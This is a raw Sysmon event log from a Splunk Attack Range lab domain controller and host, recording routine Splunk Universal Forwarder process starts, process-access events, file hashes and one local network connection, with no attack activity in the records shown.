08:06:51.495{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.495{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F81B-60EB-EA7D-00000000CF01}9508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.495{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81B-60EB-EA7D-00000000CF01}9508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.481{466BC892-F81B-60EB-EA7D-00000000CF01}9508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.195{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C35834EBE052A4D97483ED6A4CB84D3,SHA256=C1C6B65ABBD6D893DA34363BF068798ABE8D2FFAF2D47541AC98CCA91BC57AC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.195{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=249E327DCFBE9E00F94DAFF7A8CE4F49,SHA256=DEF7BE7DCE5B323B23C6E9B57A03577D08DEF3792064911D34869D37FB6E789A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:42.592{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61952-false10.0.1.12-8000- 23542300x80000000000000001054310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.064{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B88F0B2A47142BC16BC82A431B4EAAFC,SHA256=4906C8DCD7E094F596178E74CC9C3BD01F7E0B218402169B1BDA9F274C8F1D42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810224Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:52.756{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C072D387BB79DA90CA2454FA09C56A0F,SHA256=543B1B65FBFF368267450A64FB563A0E541FC11F9899051024D6454C52A86DD5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.979{466BC892-F81C-60EB-EC7D-00000000CF01}879610232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.732{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81C-60EB-EC7D-00000000CF01}8796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.732{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.732{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.732{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F81C-60EB-EC7D-00000000CF01}8796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.732{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.732{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.732{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81C-60EB-EC7D-00000000CF01}8796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.727{466BC892-F81C-60EB-EC7D-00000000CF01}8796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.495{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C35834EBE052A4D97483ED6A4CB84D3,SHA256=C1C6B65ABBD6D893DA34363BF068798ABE8D2FFAF2D47541AC98CCA91BC57AC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.111{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81C-60EB-EB7D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.111{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.111{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.111{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.111{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.111{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F81C-60EB-EB7D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.095{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81C-60EB-EB7D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.097{466BC892-F81C-60EB-EB7D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.080{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EAA37D9198B2C744803303621726DB,SHA256=8E4A24B766E91D3F64BE0482927A45BD2B4D5581CD1F7EE289FDC8D1B809B244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810225Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:53.787{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61CCDD6DC2EF98B13562D911F68B6FB8,SHA256=099D411096732C2B35E98FE4A5C10CF3CBB075CB7738FCBE3757700361035503,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.981{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81D-60EB-EE7D-00000000CF01}9724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.981{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.981{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F81D-60EB-EE7D-00000000CF01}9724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 